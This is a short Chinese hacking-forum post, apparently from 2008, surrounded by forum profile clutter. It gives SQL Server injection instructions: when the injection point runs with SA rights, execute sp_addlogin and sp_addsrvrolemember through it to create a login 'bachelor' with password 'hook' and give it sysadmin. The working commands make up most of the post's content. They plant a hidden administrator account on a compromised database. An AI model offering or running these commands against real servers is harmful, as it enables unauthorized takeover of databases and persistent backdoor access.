|
- 帖子
- 10
- 积分
- 15
- 威望
- 20
- 金钱
- 16
- 在线时间
- 0 小时
|
如果是SA,可以先尝试TELNET,如果能成功,就在注入点执行:
exec master.dbo.sp_addlogin bachelor hook;
exec master.dbo.sp_addsrvrolemember bachelor,sysadmin
这个命令就是添加一个用户名为bachelor密码为hook的SQL用户,权限为SA
然后再在SQL查询分析器中执行一些语句
帖子11 精华0 积分31 阅读权限40 来自china 在线时间5 小时 注册时间2007-11-6 最后登录2008-7-11 查看详细资料引用 报告 回复 TOP
blue_wind 
晶莹剔透§烈日灼然 |
|
发表于 2008-7-22 14:57
| 